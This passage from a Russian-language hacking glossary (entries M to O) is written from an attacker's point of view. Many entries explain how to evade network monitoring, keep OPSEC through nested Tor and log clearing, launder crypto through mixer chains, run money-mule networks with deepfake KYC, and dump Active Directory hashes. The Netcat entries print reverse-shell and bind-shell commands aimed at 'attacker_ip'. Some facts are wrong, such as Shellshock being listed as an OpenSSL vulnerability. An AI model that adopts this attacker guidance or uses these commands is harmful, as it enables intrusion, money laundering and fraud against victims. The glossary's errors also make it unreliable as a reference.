Monero Mixer Миксер для Monero (менее актуален, так как Monero уже приватна). Некоторые группы используют Monero напрямую без миксера. Для выкупов Monero предпочтительнее Bitcoin.

MongoDB NoSQL база данных. Уязвимости MongoDB: открытые порты (27017) в интернет, отсутствие аутентификации, NoSQL injection. Утечки данных из MongoDB частая причина брешей.

Monitor (Network) Мониторинг сети. Для атакующего мониторинг угроза: нужно действовать тихо, не создавать аномального трафика, использовать шифрование.

Mono Open-source реализация .NET для Linux/macOS. Mono может использоваться для запуска .NET-малвари на не-Windows платформах.

Monte Carlo Метод Монте-Карло класс вычислительных алгоритмов, использующих случайные выборки для получения численных результатов. В контексте кибербезопасности метод Монте-Карло используется для: моделирования распространения атак (симуляция заражения сети), оценки рисков (вероятность успеха атаки), взлома паролей (вероятностные методы подбора), оптимизации параметров атаки (например, выбор оптимального времени для эксплуатации). Для атакующего метод Монте-Карло может быть полезен при планировании сложных атак с множеством переменных, но в ручном режиме используется редко, чаще автоматизированными инструментами (симуляторы). В хакерском словаре термин встречается в контексте продвинутых техник, но не является базовым.

Morphing (Code) Морфинг кода: автоматическое изменение кода при каждой компиляции (полиморфизм) для обхода сигнатурных детектов. Используется в малвари (метаморфизм).

Mosaic В контексте кибербезопасности Mosaic проект Европейского Союза по стандартизации кибербезопасности (Mosaic project), направленный на разработку общих стандартов и методологий для оценки киберрисков. Также "мозаика" может относиться к мозаичной атаке (mosaic attack) технике, при которой атакующий собирает разрозненные фрагменты данных из разных источников, чтобы составить полную картину (аналог OSINT-агрегации). Например, сбор PII из разных утечек для создания synthetic identity. В контексте хакерского словаря термин встречается в основном в академической литературе и отчетах по стандартизации, а не в практических атаках.

MOTD (Message of the Day) Сообщение дня в Linux. MOTD может быть изменен атакующим для: скрытия backdoor (сообщение не выводится), фишинга (ссылки).

MOTOR (Mobile Tool for Recon) Инструмент OSINT для мобильных устройств.

MOU (Memorandum of Understanding) Меморандум о взаимопонимании (Memorandum of Understanding) документ, фиксирующий договоренности между организациями о сотрудничестве. В контексте кибербезопасности MOU могут заключаться между CISA и ISAC (Information Sharing and Analysis Center) для обмена информацией об угрозах. Для атакующего MOU означает, что информация о его атаке может быстрее распространяться между организациями.

Mount Монтирование файловой системы. В атаках mount используется для: доступа к зашифрованным разделам (если ключи известны), монтирования образов дисков, изменения файловых систем.

Mousetrap Техника защиты: ловушка для атакующих (honeypot). В контексте атак mousetrap может быть: файл-ловушка, открывающийся только при попытке чтения.

MPLS (Multiprotocol Label Switching) Протокол маршрутизации, используемый в крупных сетях. Атаки на MPLS: label switching attacks, DoS. Для атакующего MPLS не актуален без доступа к сети оператора.

MSSP (Managed Security Service Provider) Провайдер управляемых услуг безопасности. MSSP управляет EDR, SIEM, SOC для клиентов. Для атакующего MSSP означает, что за логами смотрят эксперты, которые могут обнаружить аномалии быстрее.

MTBF (Mean Time Between Failures) Среднее время между отказами метрика надежности оборудования (жесткие диски, серверы, сетевое оборудование), показывающая среднее время работы между двумя отказами. В контексте кибератак MTBF используется при планировании физических атак на оборудование (например, уничтожение жестких дисков, выход из строя серверов). Знание MTBF помогает предсказать, как долго система может работать без обслуживания, и выбрать время для атаки (например, когда оборудование близко к отказу). Однако в хакерском словаре MTBF не является ключевым термином, чаще встречается в документации по надежности, а не в эксплуатации уязвимостей.

MTM (Man-in-the-Mobile) Атака на мобильное устройство: вредоносное приложение перехватывает SMS, push-уведомления, ввод в банковском приложении. Используется для обхода MFA (перехват SMS) и кражи данных из банковских приложений.

MTProto Протокол Telegram. MTProto использует шифрование, но не является end-to-end по умолчанию (только в секретных чатах). Для атакующего Telegram удобный канал для C2 и коммуникации, но логи могут быть предоставлены law enforcement.

MUA (Mail User Agent) Почтовый клиент (Outlook, Thunderbird). MUA цель для фишинга, macro malware, BEC. Атаки на MUA могут дать доступ к корпоративной почте.

MuddyWater APT-группа, связанная с MOIS (Иран). MuddyWater специализируется на: шпионаже, backdoors (PupyRAT, DNSpionage), атаках на банки, аэропорты, defense-adjacent компании. В марте 2026 MuddyWater взламывал IP-камеры Hikvision и Dahua для поддержки ракетных ударов (cyber-enabled targeting).

Mule (Money Mule) Дроп (подставное лицо), которое переводит украденные деньги через свои счета, снимает наличными, покупает криптовалюту. Mule получает комиссию (5-20%). В 2026 mule-сети создаются с помощью deepfake KYC (синтетические личности проходят верификацию в банках).

Mule Herding Управление сетью дропов (mules). Mule herding включает: вербовку mules, организацию переводов, обналичивание. В 2026 mule herding автоматизирована: AI-сгенерированные личности, автоматические переводы через криптобиржи.

Multi-Factor Authentication (MFA) Многофакторная аутентификация метод аутентификации, требующий двух или более факторов из трех категорий: знание (пароль, PIN), владение (токен, телефон, аппаратный ключ), биометрия (отпечаток, лицо). MFA значительно усложняет атаки, но обходится через: vishing (звонок в helpdesk с просьбой сбросить MFA), AiTM (перехват сессии), SIM-swapping (перенос номера), session hijacking (кража cookies), MFA fatigue (многократные push-уведомления).

Multisig (Multi-signature) Мультиподпись: требование нескольких подписей для выполнения транзакции (например, 2 из 3). Используется в криптовалютах для защиты холодных кошельков. Bybit hack: атакующие обманули подписантов (signers), которые думали, что подписывают обычный перевод, а подписали слив всех средств через подмену интерфейса (JS injection).

Multitenancy Мультитенантность: архитектура, где несколько клиентов используют одну систему (SaaS). Атаки на мультитенантность: cross-tenant attack (переход между клиентами через misconfig, over-privileged integrations). ShinyHunters атаковал Salesforce (мультитенантный SaaS), получая данные сотен клиентов через misconfig.

MVP (Minimum Viable Product) В контексте атак MVP минимальная жизнеспособная атака: быстрый initial access, быстрая эксфильтрация, без сложного lateral movement. Используется для быстрого получения выкупа.

MX (Mail Exchange) DNS-запись, указывающая почтовый сервер домена. MX-записи используются в OSINT для определения почтовых провайдеров, поиска уязвимостей email-серверов.

MXDR (Managed Extended Detection and Response) Управляемое расширенное обнаружение и реагирование (XDR как услуга). MXDR-провайдеры (CrowdStrike, SentinelOne) управляют защитой для организаций.

MyDoom Червь (2004), один из самых быстро распространявшихся. MyDoom использовался для DDoS и открывал backdoor. В 2026 legacy.

MySQL Реляционная база данных. Уязвимости MySQL: SQL injection, слабые пароли, misconfig (публичный доступ, отсутствие SSL). Атаки на MySQL: кража данных, выполнение команд (SELECT INTO OUTFILE).

N

NAC (Network Access Control) Контроль доступа к сети: системы, проверяющие устройства (компьютеры, ноутбуки) перед подключением к корпоративной сети (соответствие политикам: антивирус, обновления, сертификаты). Для атакующего NAC препятствие: скомпрометированное устройство может не пройти проверку. Обход NAC: клонирование MAC-адреса легитимного устройства, использование устройств, не подпадающих под NAC (принтеры, IoT), или физическое подключение к сети через порт, где NAC не включен.

NACK (Negative Acknowledgment) Отрицательное подтверждение в протоколах. В атаках NACK может использоваться для: DoS (отправка NACK вместо ACK), анализа поведения систем.

Nagle's Algorithm Алгоритм в TCP, объединяющий небольшие пакеты для уменьшения накладных расходов. В C2-коммуникациях Nagle может задерживать отправку heartbeat, что может быть использовано для имитации легитимного трафика.

NAND Mirroring Создание образа NAND-памяти (flash) для извлечения данных из мобильных устройств, IoT. Используется в forensics и атаках (физический доступ). Для атакующего NAND mirroring способ извлечь данные из заблокированного устройства (если есть физический доступ).

NAT (Network Address Translation) Трансляция сетевых адресов: преобразование приватных IP в публичные. NAT используется в корпоративных сетях, домашних роутерах. Для атакующего NAT препятствие: нужно понять реальную топологию сети, найти устройства, которые доступны из интернета (port forwarding, UPnP). NAT также скрывает внутреннюю структуру сети.

Native API Низкоуровневые API Windows (ntdll.dll), через которые приложения взаимодействуют с ядром. EDR ставят хуки на Native API для мониторинга. Direct syscalls обход хуков: вызов Native API напрямую, минуя ntdll.dll.

NBT-NS (NetBIOS Name Service) Протокол разрешения имен NetBIOS, используется в локальных сетях Windows. NBT-NS уязвим к spoofing: атакующий может ответить на NBT-NS-запрос, выдавая себя за легитимный хост, и перехватить NTLM-хэш (responder). Рекомендуется отключать.

NC (Netcat) Сетевой инструмент для чтения и записи данных через TCP/UDP. NC используется для: reverse shell (nc -e /bin/sh), порт-сканнирования, передачи файлов. NC классический инструмент для получения shell.

NCSC (National Cyber Security Centre) Национальный центр кибербезопасности (Великобритания, Нидерланды и др.). NCSC выпускает предупреждения, рекомендации, координирует реагирование. В 2026 NCSC координировался с CISA по поводу атак Interlock и Handala.

NDA (Non-Disclosure Agreement) Соглашение о неразглашении. В контексте атак NDA используется для: защиты информации об уязвимостях (bug bounty), сокрытия факта выплаты выкупа (ransomware). Жертвы часто подписывают NDA с атакующими, чтобы те не разглашали факт утечки.

NDIS (Network Driver Interface Specification) Интерфейс драйверов сетевых устройств Windows. NDIS-драйверы могут быть использованы для: фильтрации трафика, скрытия C2-коммуникации, отключения сетевых детектов.

NDR (Network Detection and Response) Сетевое обнаружение и реагирование: системы, анализирующие сетевой трафик для выявления угроз (DNS-туннели, C2-коммуникации, lateral movement). Для атакующего NDR угроза: нужно шифровать трафик (TLS), использовать легитимные протоколы (HTTPS, DNS), избегать аномалий (нерегулярные heartbeat).

NEC (National Encryption Center) Национальный центр шифрования теоретический орган (не существует как единая структура в США; есть NIST, NSA). В контексте атак термин может встречаться в литературе по криптографии, но не является частью хакерского инструментария. В некоторых странах могут существовать национальные центры шифрования (например, в Китае), но для атакующего это не ключевой термин.

Nested Onion Вложенная луковая маршрутизация: использование Tor в несколько слоев (Tor over VPN, прокси-цепочки) для полной анонимности. Пример: C2 Tor VPN Tor интернет. Nested onion используется для: сокрытия реального IP C2, защиты от деанонимизации через анализ времени, обхода блокировок Tor.

Nested Services Вложенные криптосервисы: цепочка обменников и свопов для отмывания средств. Пример: Bitcoin миксер (Sinbad) Monero DeFi (Uniswap) Ethereum другой миксер чистый кошелек. Nested services используются для запутывания следа, чтобы blockchain analysis не мог отследить средства.

NET (Microsoft .NET) Фреймворк для разработки приложений Windows. .NET-малварь (C#, VB.NET) компилируется в CIL (Common Intermediate Language), затем JIT-компилируется. .NET малварь легко декомпилируется (dnSpy, ILSpy), поэтому атакующие используют обфускаторы (ConfuserEx, .NET Reactor). Cobalt Strike, Covenant, Sliver C2 с .NET-агентами.

NetBIOS Протокол для сетевого взаимодействия в Windows. NetBIOS уязвим к: NBT-NS spoofing, SMB relay. В 2026 рекомендуется отключать NetBIOS, если не требуется для legacy-приложений.

Netcat Сетевой инструмент для чтения и записи данных через TCP/UDP (сетевой швейцарский нож). Netcat (nc) используется для: reverse shell (nc -e /bin/sh attacker_ip 4444), bind shell (nc -lvp 4444 -e /bin/sh), порт-сканирования, передачи файлов. Netcat классический инструмент для получения shell, но не шифрует трафик, поэтому часто заменяется на socat, ncat (с SSL).

NetFlow Протокол для сбора информации о сетевом трафике (Cisco, Juniper). NetFlow используется для обнаружения аномалий (DDoS, C2). Для атакующего NetFlow угроза: даже если трафик шифрован, NetFlow показывает объем, частоту, направления. Нужно имитировать легитимный трафик.

NetNTLM Протокол аутентификации Windows, использующий хэши NTLM. NetNTLM уязвим к: relay attacks (NTLM relay), capture (responder). Pass-the-Hash использует NTLM-хэши для аутентификации без знания пароля.

Network Mapping Построение карты сети: определение IP-адресов, открытых портов, ОС, сервисов. Инструменты: nmap, masscan, BloodHound (для AD). Network mapping первый этап после initial access для планирования lateral movement.

Network Segmentation Сегментация сети: разделение сети на изолированные сегменты (VLAN), чтобы ограничить lateral movement. Для атакующего сегментация препятствие: нужно найти пути между сегментами (jump boxes, dual-homed хосты, VPN). Handala атаковала через Intune, который имел доступ ко всем сегментам, обходя сегментацию.

NFC (Near Field Communication) Бесконтактная связь на малом расстоянии. NFC используется для: платежей, пропусков (RFID), клонирования карт. Атаки: NFC relay (усиление сигнала), клонирование (Proxmark3), перехват.

NFS (Network File System) Сетевой файловая система (Unix/Linux). NFS уязвим к: misconfig (экспорт на весь мир), отсутствию аутентификации, spoofing. Компрометация NFS дает доступ к файлам сервера.

Nginx Веб-сервер и reverse proxy. Nginx используется для: хостинга фишинговых сайтов, C2 (reverse proxy), балансировки нагрузки. Уязвимости Nginx: buffer overflow, misconfig (alias traversal).

NIC (Network Interface Card) Сетевой интерфейс. В атаках используется: изменение MAC-адреса (MAC spoofing), promiscuous mode (перехват трафика).

NIDS (Network Intrusion Detection System) Сетевой IDS (Snort, Suricata). NIDS анализирует трафик на предмет сигнатур атак. Для обхода атакующие используют: шифрование (TLS), фрагментацию пакетов, обфускацию.

Nim Язык программирования, используемый для создания малвари (Nim-based malware). Nim компилируется в C, затем в машинный код, что затрудняет reverse engineering. Nim-малварь реже детектируется, чем C/C++ или .NET.

NIST (National Institute of Standards and Technology) Национальный институт стандартов и технологий США. NIST разрабатывает стандарты кибербезопасности (NIST SP 800-53, NIST Cybersecurity Framework). Для атакующего NIST не актуален, но знание стандартов помогает понять, как защитники строят свою защиту.

NIST Cybersecurity Framework (CSF) Фреймворк кибербезопасности NIST (Identify, Protect, Detect, Respond, Recover). Используется организациями для построения программы безопасности. Для атакующего CSF карта, где искать слабые места (обычно Detect и Respond слабее).

NLA (Network Level Authentication) Аутентификация на сетевом уровне для RDP. NLA требует аутентификации до создания сессии, что предотвращает некоторые атаки на RDP (например, BlueKeep). Для атакующего NLA препятствие, но не непреодолимое.

NLB (Network Load Balancing) Балансировка нагрузки на сетевом уровне. NLB может скрывать реальные IP серверов, что затрудняет разведку.

Nmap Сканер сети, стандарт для рекогносцировки. Nmap определяет: открытые порты, ОС, сервисы, версии ПО. Атакующие используют Nmap для: сканирования внутренней сети после initial access, поиска уязвимых сервисов.

NMI (Non-Maskable Interrupt) Немаскируемое прерывание. NMI используется для: отладки, анализа памяти (crash dump). Для атакующего NMI может быть использовано для вызова дампа памяти, из которого можно извлечь ключи.

NOC (Network Operations Center) Центр управления сетью. NOC отвечает за доступность сетевых сервисов. Для атакующего NOC цель для отвлечения (DDoS) или взлома (доступ к конфигурациям сетевого оборудования).

Node.js Среда выполнения JavaScript на сервере. Node.js используется для: веб-приложений, API, C2. Уязвимости Node.js: deserialization, RCE через eval, supply chain (npm). Node.js-малварь (например, шифровальщики) встречается.

NoSQL Injection Инъекция в NoSQL базы данных (MongoDB, CouchDB). Пример: { $ne: null } вместо пароля. NoSQL injection может привести к обходу аутентификации, краже данных.

NotPetya Wiper-атака (2017), маскировавшаяся под ransomware. NotPetya уничтожила данные на тысячах компьютеров в Украине и по всему миру. Связана с российскими государственными акторами. Handala использовала аналогичную тактику: уничтожение данных (wiper) под видом атаки.

Nova В контексте атак Nova C2-фреймворк.

Npcap Библиотека для захвата пакетов (Windows), форк WinPcap. Используется в Nmap, Wireshark. Для атакующего Npcap инструмент для перехвата трафика.

NPM (Node Package Manager) Менеджер пакетов для Node.js. Supply chain атаки через npm: публикация вредоносных пакетов с похожими именами (typosquatting), или компрометация легитимных пакетов. Разработчики, устанавливая пакеты, могут получить малварь (infostealer, backdoor).

NPT (Network Time Protocol) См. NTP. NTP (Network Time Protocol) протокол синхронизации времени (порт 123). NTP используется для синхронизации часов в сетях. Атаки на NTP: NTP amplification (DDoS), фальсификация времени (сброс сертификатов, нарушение работы Kerberos, сбой логов). В корпоративных сетях NTP-серверы цель для сбоя синхронизации, что может нарушить работу Kerberos (билеты имеют временные метки, разница >5 минут приводит к ошибкам).

NRT (Near Real-Time) Почти реальное время. В контексте атак NRT мониторинг с задержкой в секунды/минуты, а не часы/дни.

NS (Name Server) DNS-сервер. Атаки на NS: DNS hijacking, компрометация регистратора, DDoS на NS.

NSA (National Security Agency) Агентство национальной безопасности США. NSA занимается разведкой, кибероперациями, разработкой инструментов (Ghidra, SELinux). NSA также публикует руководства по безопасности. Для атакующего NSA противник, который может быть вовлечен в расследование атак на критическую инфраструктуру.

NSIS (Nullsoft Scriptable Install System) Система установки ПО. NSIS-инсталляторы могут быть использованы для распространения малвари (обфускация, анти-сэндбокс).

NTDS.dit Файл базы данных Active Directory (хранится в %SystemRoot%\NTDS\NTDS.dit). NTDS.dit содержит хэши паролей всех пользователей домена, информацию о группах, компьютерах, политиках. Дамп NTDS.dit одна из главных целей после компрометации Domain Admin. Методы: ntdsutil, vssadmin, diskshadow, DCSync (удаленный дамп).

NTLM (NT LAN Manager) Протокол аутентификации Windows. NTLM-хэши используются для аутентификации (Pass-the-Hash). NTLM уязвим к: relay attacks (NTLM relay), capture (responder), оффлайн-взлому (Hashcat). В 2026 Microsoft рекомендует переход на Kerberos, но NTLM все еще широко используется.

NTLM Hash Хэш пароля в протоколе NTLM. NTLM-хэш может быть использован для Pass-the-Hash аутентификации без знания пароля. NTLM-хэши взламываются оффлайн (Hashcat) со скоростью ~300 млрд паролей в секунду на RTX 4090.

NTLM Relay Атака, при которой злоумышленник перехватывает NTLM-аутентификацию (через responder) и ретранслирует ее на другой сервер для получения доступа. NTLM relay используется для lateral movement и повышения привилегий (например, relay на SMB для выполнения команд).

NTP (Network Time Protocol) Протокол синхронизации времени. Атаки на NTP: NTP amplification (DDoS), фальсификация времени (сброс сертификатов, нарушение логов). В корпоративных сетях NTP-серверы цель для сбоя синхронизации, что может нарушить работу Kerberos.

NTVDM (NT Virtual DOS Machine) Виртуальная машина для DOS-приложений в Windows. Уязвимости NTVDM могут использоваться для повышения привилегий (LPE). В 2026 NTVDM редко используется.

NULL Session Анонимное соединение с Windows (SMB) без аутентификации. NULL session использовалась для получения информации о домене (список пользователей, группы) в старых версиях Windows. В 2026 NULL session отключена по умолчанию, но может быть включена для совместимости.

NVD (National Vulnerability Database) Национальная база уязвимостей США (NIST). NVD содержит CVE с оценками CVSS, ссылками на патчи. Для атакующего NVD источник информации о fresh 1-day.

NX (No-eXecute) Аппаратная защита от выполнения кода в стеке и куче (DEP Data Execution Prevention). NX затрудняет эксплуатацию buffer overflow. Обход через ROP (Return-Oriented Programming).

O

O2C (Order to Cash) Процесс от заказа до получения денег. В BEC-атаках злоумышленники атакуют O2C: подделывают счета, изменяют реквизиты платежей, перехватывают подтверждения. Знание O2C целевой компании помогает в проведении BEC.

OAuth (Open Authorization) Протокол авторизации, позволяющий приложениям получать доступ к данным пользователя без передачи пароля. OAuth использует токены (access token, refresh token). Атаки на OAuth: token theft (кража токенов через инфостилеры), misconfig (избыточные права), OAuth phishing (поддельный экран согласия), переиспользование refresh token. ShinyHunters использует OAuth token theft для доступа к Salesforce через интеграции.

OAuth Token Theft Кража OAuth-токенов (access token, refresh token) для получения доступа к API от имени пользователя. Токены крадутся через: инфостилеры (из локальных хранилищ браузеров, из памяти), XSS, перехват трафика (MITM). В отличие от пароля, токен может не требовать MFA. ShinyHunters использует OAuth token theft для доступа к Salesforce.

OBEX (Object Exchange) Протокол для обмена объектами по Bluetooth (используется в Bluesnarfing). OBEX уязвим к: перехвату данных, выполнению кода.

OBEX Push Функция Bluetooth для отправки файлов. Используется в атаках: отправка вредоносного файла на устройство без подтверждения (если настройки безопасности слабые).

Obfuscation Обфускация: преобразование кода в форму, сложную для понимания и анализа, но сохраняющую функциональность. Методы: переименование переменных, добавление мертвого кода, шифрование строк, контроль потока (flattening), упаковка (packing). Обфускация используется для: усложнения reverse engineering, обхода сигнатурных детектов.

Objective-C Язык программирования для iOS/macOS. Малварь для macOS может быть написана на Objective-C (или Swift). Реверс-инжиниринг Objective-C сложнее, чем Swift, из-за динамической природы.

Oblivious DNS Протокол DNS, скрывающий запросы от DNS-сервера. Для атакующего Oblivious DNS способ скрыть C2-запросы.

OCM (Object Control Management) Управление объектами (Object Control Management) термин из области управления базами данных и распределенными системами. В контексте атак не является ключевым термином. Может встречаться в документации к legacy-системам.

OCSP (Online Certificate Status Protocol) Протокол проверки статуса сертификата (отозван или нет). OCSP используется в TLS. Для атакующего OCSP важен: если используется OCSP stapling, можно узнать, когда сертификат был отозван; также OCSP может использоваться для сбора информации о сервере.

ODBC (Open Database Connectivity) API для доступа к базам данных. ODBC-строки подключения могут содержать пароли в plaintext. Для атакующего кража ODBC-строк (из конфигурационных файлов, переменных окружения) дает доступ к базам данных.

ODS (Open Document Spreadsheet) Формат электронных таблиц OpenOffice/LibreOffice. Может содержать макросы (аналогично Excel). Используется в фишинге для обхода фильтров, ориентированных на MS Office.

OEM (Original Equipment Manufacturer) Производитель оборудования. OEM-разделы на жестких дисках могут содержать вредоносное ПО, установленное на заводе (supply chain attack). Пример: Supermicro backdoor.

OEP (Original Entry Point) Точка входа оригинальной программы после распаковки упакованного бинарника. Для unpacking (распаковки малвари) нужно найти OEP.

OFAC (Office of Foreign Assets Control) Управление США по контролю за иностранными активами. OFAC вводит санкции против криптомиксеров (Tornado Cash), даркнет-маркетов, хакерских групп. Для атакующего OFAC риск: использование подсанкционных сервисов может привести к блокировке средств на биржах, сотрудничающих с OFAC.

Offensive Security Наступательная безопасность: пентест, red team, эксплуатация уязвимостей. Offensive Security наша область.

Offline Attack Оффлайн-атака: взлом хэшей, расшифровка файлов, анализ дампов памяти без взаимодействия с целью. Оффлайн-атаки не обнаруживаются системами защиты, потому что не создают сетевого трафика. Пример: оффлайн-взлом NTLM-хэшей (Hashcat).

Offline Password Cracking Взлом хэшей паролей оффлайн, без взаимодействия с системой-жертвой. Используются GPU-фермы (NVIDIA RTX 4090, A100) для ускорения. Скорость: ~300 млрд паролей в секунду для NTLM. Хэши получаются через DCSync, дамп NTDS.dit, дамп LSASS.

Offset Смещение в памяти или файле. В эксплойтах offset используется для вычисления адресов функций (например, offset до shellcode). В reverse engineering offset используется для навигации по бинарному файлу.

OID (Object Identifier) Идентификатор объекта в ASN.1, X.509 сертификатах, SNMP. OID может использоваться для fingerprinting (определение типа сертификата, устройства). В атаках OID может быть использован для: подделки сертификатов, обхода проверок.

OLAP (Online Analytical Processing) Аналитическая обработка данных. OLAP-системы хранят большие объемы данных (Data Warehouse). Для атакующего OLAP цель для кражи больших массивов данных.

OLE (Object Linking and Embedding) Технология Microsoft для встраивания объектов (Excel в Word). OLE использовался в атаках через документы: вредоносные объекты, ссылки на внешние ресурсы. В 2026 OLE по умолчанию ограничен, но может быть включен для совместимости.

OLE Automation Автоматизация OLE, позволяющая управлять приложениями (Excel, Word) из скриптов. Используется в макросах для выполнения команд, скачивания малвари.

OLE Object Внедренный объект OLE в документе. OLE объекты могут быть использованы для: выполнения кода (например, Excel лист внутри Word, запускающий макросы), ссылок на внешние ресурсы (SMB-шары, кража хэшей).

OLEVBA Инструмент для анализа VBA-макросов в офисных документах. Используется защитниками для извлечения макросов. Для атакующего OLEVBA угроза: макросы могут быть проанализированы.

OLEVBA (OLE Visual Basic for Applications) OLE Visual Basic for Applications VBA (Visual Basic for Applications) в контексте OLE (Object Linking and Embedding). VBA используется в макросах Office. OLEVBA термин, объединяющий VBA и OLE. OLEVBA-макросы классический вектор доставки малвари: жертва открывает документ (Word, Excel) с вредоносным макросом. В 2026 макросы по умолчанию отключены, но атакующие используют: убеждение включить макросы (социальная инженерия), эксплуатацию уязвимостей в VBA (CVE-2017-11882), или другие векторы (ClickFix).

OLTP (Online Transaction Processing) Транзакционная обработка данных. OLTP-системы (банковские, платежные) цель для атак на транзакции (BEC, модификация сумм).

Omni В контексте атак Omni OmniRAT, коммерческий RAT для Android и Windows.

OmniRAT Коммерческий RAT (Remote Administration Tool), используемый для удаленного управления устройствами. OmniRAT может красть данные, записывать звук, управлять камерой. В 2026 считается legacy.

On-Path Attack Атака "на пути" (man-in-the-middle). Название "on-path" используется вместо "man-in-the-middle" в некоторых стандартах (RFC). Суть та же: перехват и модификация трафика.

On-Prem (On-Premises) Локальная инфраструктура (в отличие от облака). On-prem системы часто имеют более слабую защиту, чем облачные, но также могут быть более изолированными. Гибридные среды (on-prem + облако) создают дополнительные уязвимости (AADConnect).

One-Time Pad (OTP) Абсолютно стойкое шифрование, использующее ключ длиной с сообщение. В реальности OTP не используется из-за проблемы распространения ключей. Термин OTP также используется для одноразовых паролей (one-time password), но это другое.

One-Time Password (OTP) Одноразовый пароль, используемый в MFA (SMS, TOTP, push). OTP цель для AiTM (Adversary-in-the-Middle), SIM-swapping, vishing (сброс MFA через helpdesk).

Onion (Tor) Анонимная сеть Tor (The Onion Router). Onion-сервисы (домены .onion) используются для: C2, leak sites (ShinyHunters), даркнет-маркетов, коммуникации. Onion-сервисы обеспечивают скрытность сервера (не раскрывают IP). Для атакующего onion инструмент для скрытой инфраструктуры.

Onion Routing Маршрутизация через луковую сеть (Tor), где трафик проходит через несколько узлов, каждый из которых знает только предыдущий и следующий. Onion routing обеспечивает анонимность.

OOXML (Office Open XML) Формат офисных документов Microsoft (.docx, .xlsx, .pptx). OOXML ZIP-архив с XML-файлами. Фишинговые документы могут содержать вредоносные макросы, OLE-объекты, ссылки.

OPC (OLE for Process Control) Промышленный стандарт связи для автоматизации. OPC используется в ICS/SCADA. Уязвимости OPC: отсутствие аутентификации, выполнение кода. Для атакующего OPC вектор для атак на промышленные системы.

OPC DA (Data Access) Классический OPC для доступа к данным в реальном времени. Уязвим к DCOM-атакам.

OPC UA (Unified Architecture) Современный OPC с аутентификацией, шифрованием. OPC UA сложнее атаковать, но возможны misconfig (слабые сертификаты, default credentials).

Open Source Intelligence (OSINT) Разведка по открытым источникам: сбор информации из публичных данных (соцсети, форумы, DNS, WHOIS, GitHub, Shodan). OSINT используется для: сбора email-адресов сотрудников, IP-адресов, технологического стека, информации о партнерах. ShinyHunters использует OSINT для поиска Salesforce Experience Cloud сайтов.

Open Web Application Security Project (OWASP) Сообщество по безопасности веб-приложений. OWASP Top 10 список наиболее критических уязвимостей (SQL injection, XSS, CSRF, broken access control). Для атакующего OWASP карта: атакуем то, что в Top 10, потому что многие организации не исправляют эти уязвимости.

OpenAPI Спецификация для описания REST API. OpenAPI-файлы (swagger) могут раскрывать эндпоинты, параметры, схемы данных. Для атакующего OpenAPI карта API для атак.

OpenCL Фреймворк для параллельных вычислений на GPU и CPU. Используется в Hashcat для ускорения взлома паролей.

OpenFlow Протокол для Software-Defined Networking (SDN). Уязвимости OpenFlow могут привести к: перенаправлению трафика, DoS, компрометации контроллера.

OpenID Connect (OIDC) Протокол аутентификации поверх OAuth 2.0. OIDC используется для Single Sign-On (SSO). Атаки на OIDC: token theft, misconfig (избыточные права), IDP spoofing.

OpenSSL Библиотека для TLS/SSL. Уязвимости OpenSSL: Heartbleed (CVE-2014-0160), Shellshock (CVE-2014-6271). В 2026 OpenSSL все еще используется в старых системах.

OpenVAS Open-source сканер уязвимостей (часть Greenbone). OpenVAS используется для: сканирования сетей на наличие уязвимостей, проверки default credentials. Для атакующего OpenVAS инструмент для рекогносцировки.

Operation (OpSec) Операционная безопасность (OPSEC): меры по сокрытию активности, защите от обнаружения. Включает: использование burner-аккаунтов, шифрование, nested onion, минимизацию следов, compartmentalization. OPSEC основа долгосрочного присутствия.

Operation 404 Седьмая фаза бразильской операции против онлайн-пиратства (март 2026). 675 сайтов и 14 приложений taken down. Международная коалиция: Brazil, USA, UK, Peru, Argentina, Paraguay, EUIPO. Для атакующего Operation 404 пример takedown инфраструктуры, используемой для распространения малвари и C2.

Operation Epic Fury Совместная военная операция США и Израиля (начата 28 февраля 2026) против иранской инфраструктуры. Цели: IRGC Cyber and Electronic Headquarters, Intelligence Directorate, Bank Sepah в Тегеране. Спусковой крючок для иранской ответной кампании (True Promise-4, Handala). Для атакующего Epic Fury пример кибер-кинетической координации.

Operation True Promise-4 17-я волна иранских ракетных ударов (4 марта 2026) в ответ на Epic Fury. Гиперзвуковые ракеты пробили THAAD, уничтожены радарные системы. Для атакующего True Promise-4 пример координации кибератак (Handala, MuddyWater) с кинетическими ударами.

OPM (Office of Personnel Management) Управление кадров США. OPM breach (2015) утечка 21.5M записей (SF-86, данные о допусках). В 2026 данные OPM все еще используются для identity theft и шпионажа.

OPML (Outline Processor Markup Language) Формат XML для обмена структурированными данными (списки, контуры). Используется в RSS-агрегаторах, подкастах. В контексте атак OPML может быть использован для: фишинга (OPML-файлы могут содержать вредоносные ссылки), импорта конфигураций (если приложение не проверяет подписи). Однако в реальных атаках OPML встречается крайне редко.

OPSEC (Operations Security) Операционная безопасность (Operations Security) меры по сокрытию активности, защите от обнаружения, минимизации следов. Включает: использование burner-аккаунтов (одноразовые), шифрование, nested onion (Tor over VPN), compartmentalization (разделение знаний), очистку логов, память-только выполнение (memory-only), избегание повторения TTPs. OPSEC основа долгосрочного присутствия.

Optimization (Malware) Оптимизация малвари для уменьшения размера, ускорения работы, обхода детектов. Оптимизация включает: удаление отладочных символов, статическую компиляцию, минимизацию импортов.

Oracle (DeFi) Оракул в DeFi: источник данных о ценах (Chainlink, TWAP). Oracle manipulation атака, при которой цена актива временно искажается (через flash loan), чтобы затем воспользоваться этим в уязвимом протоколе. Venus $3.7M пример oracle manipulation.

Oracle Manipulation Манипуляция оракулом цен в DeFi. Атакующий использует flash loan для искажения цены актива на DEX, затем протокол, использующий этот оракул, позволяет вывести ликвидность по завышенной цене. Oracle manipulation одна из основных атак на DeFi.

Orca Security Компания по безопасности облака. Orca Research Pod опубликовала концепцию AILM (AI-Induced Lateral Movement) в марте 2026.

Order of Engagement Порядок действий при атаке. Определяет последовательность: разведка initial access lateral movement эксфильтрация extortion.

Ore (Mining) В контексте криптомайнинга ore добытая криптовалюта (блок). Для атакующего mining способ монетизации ботнета.

ORF (Open Reverse File) Термин из области криптографии и файловых систем. В контексте атак не является ключевым термином.

Origin Header Заголовок HTTP, указывающий источник запроса. Origin проверяется для защиты от CSRF. Атаки: CORS misconfig (Access-Control-Allow-Origin: *), origin spoofing.

OS (Operating System) Операционная система (Windows, Linux, macOS, Android, iOS). Для атакующего знание ОС цели определяет выбор инструментов (Mimikatz для Windows, Keychain для macOS, keystrokes для Linux).

OS Detection Определение операционной системы удаленного хоста через fingerprinting (TCP/IP stack, ответы на запросы). Nmap может определить ОС с высокой точностью.

